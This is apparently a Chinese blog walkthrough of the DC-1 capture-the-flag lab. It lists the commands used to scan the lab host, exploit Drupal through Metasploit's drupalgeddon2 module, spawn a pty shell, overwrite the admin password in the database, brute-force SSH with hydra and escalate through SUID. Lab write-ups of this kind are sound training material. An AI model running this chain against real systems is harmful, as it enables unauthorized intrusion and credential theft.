DC-1

DC-1

nmap -sP 192.168.93.0/24#扫描局域网内的ip确定主机
nmap -sV 192.168.93.79#扫描靶机开方的端口

在这里插入图片描述

发现开放三个端口,我们先访问80端口。

看到了Drupal,启动msfconsole,并寻找相关攻击模块。

msfconsole
search Drupal

在这里插入图片描述

选择最新的模块进行攻击。

use exploit/unix/webapp/drupal_drupalgeddon2
set RHOST 192.168.93.79
run

在这里插入图片描述

拿到meterpreter会话,列出当前文件,发现flag1.txt。

ls
cat flag1.txt

在这里插入图片描述

根据该提示,我们去查询相关配置文件,Drupal的配置文件存于 ./sites/default/settings.php

在这里插入图片描述

拿到flag2,同时发现数据库账号和密码。

输入shell切换壳。

登陆数据库发现没有回显,可能是因为不是交互式shell。

利用python触发交互示shell。

python -c 'import pty;pty.spawn("/bin/sh")'

登陆数据库。

在这里插入图片描述

进入数据库drupaldb,查表,进入users,再把东西都列出来,发现admin和其密码。

修改admin密码:

php scripts/password-hash.sh 123456#返回shell输入
update users set pass="$S$D0EhkXn49TFszpwkBNaPbktisjrdSzUqOwL3pbTcUZ5YfsCyd4Q0" where uid=1;#mysql登陆数据库后使用

修改后登陆网站,找到flag3

在这里插入图片描述

根据提示返回终端,查找相关文件。

cat /etc/passwd

在这里插入图片描述

这里的flag应该是一个用户,之前扫描端口有一个ssh服务的端口,猜测用该需要用ssh登陆该用户,但不知道密码,所有需要爆破。

hydra -l flag4 -P /usr/share/john/password.lst 192.168.78.147 ssh -vV -f

得到密码为orange,进行ssh连接。

ssh flag4@192.168.93.79

在这里插入图片描述

根据提示得知flag可能在root目录下,但尝试进入失败。

查看当前用户

在这里插入图片描述

想办法提升为root。

这里使用SUID提权。

在这里插入图片描述

成功提升为root用户。

最后找到flag。

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值